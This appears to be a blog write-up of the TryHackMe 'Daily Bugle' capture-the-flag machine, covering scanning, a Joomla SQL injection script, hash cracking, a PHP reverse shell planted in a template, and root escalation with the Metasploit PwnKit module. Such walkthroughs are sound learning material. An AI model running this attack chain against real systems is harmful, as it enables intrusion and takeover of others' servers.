Open in app

Sign in

Write

Sign in

Daily Bugle- TryHackMe

shark0x01
4 min readSep 14, 2022

Today we will solve Daily Bugle from TryHackMe

first lets start with some enumeration.

sudo nmap -sC -sV -oA nmap/bugle 10.10.200.135

We found:

  • ssh on 22
  • http running apache on 80
  • MySQL running MariaDB on 3306

nmap revealed robots.txt contains interesting paths

now lets check the website , going to http://10.10.200.135

Good one :) jonah truly hates spiderman (answer to question 1)

ok lets check robots.txt

now we know it’s a Joomla Website, going to /administrator/

lets run joomscan since neither the website or the panel revealing the
version number.

joomscan -u http://10.10.203.230

Now we know the version number, unfortunately we didn’t find any core
vuls with joomscan

search for public exploits on google we found a python script on github

called JoomBlah. lets download it and run it

python2 joomblah.py http://10.10.200.135

we got the username and the password for jonah

its a bcrypt(md5) hash, you can use either johnTheRipper or Hashcat to crack it i will use hashcat and rockyou.txt.

hashcat.exe -m 3200 {filewithhashes} {wordlist}

Password: spiderman123

After that i tried to ssh to the machine but it didn’t work
ok, lets continue with the website lets go the panel and sign in with creds (jonah:spiderman123)

our goal now is to get a reverse shell, go Templates

go to any php file, use PHP shell from pentestmonkey
after getting a shell you may want to upgrade it

python -c ‘import pty;pty.spawn(“/bin/bash”)’
CTRL + Z
stty raw -echo ; fg
Enter + Enter
export TERM=xterm

unfortunately i couldn’t upgrade my shell due to some weird stuff with ZSH
So i created payload with msfvenom and upload it the machine

Then i created a handler

Ok now after we got a proper shell lets dive through the box
couldn’t get user.txt file with apache privileges so i decided to start to privesc directly.

Note:
This is not the intended way to solve it.
i abused CVE_2021_4034 which probably published after the machine was published and the authtor forgets to patched
so, the intended way was was to find configuration.php in the website folder
using these creds to login then priv esc using ‘yum’. :(
sorry for the inconvenience.

We already in meterpreter session lets run linux_suggester

run post/multi/recon/local_exploit_suggester

Now backgourd the current session by using backgroud command

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set lhost tun0
set lport 1337
set WRITABLE_DIR /dev/shm
run

Now wait for the session

Now we are root you can read both user.txt and root.txt

Ctf
Ctf Writeup
Tryhackme

--

--

shark0x01
shark0x01

Written by shark0x01

0 Followers
1 Following

IT Student | TOP 1% on TryHackMe

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams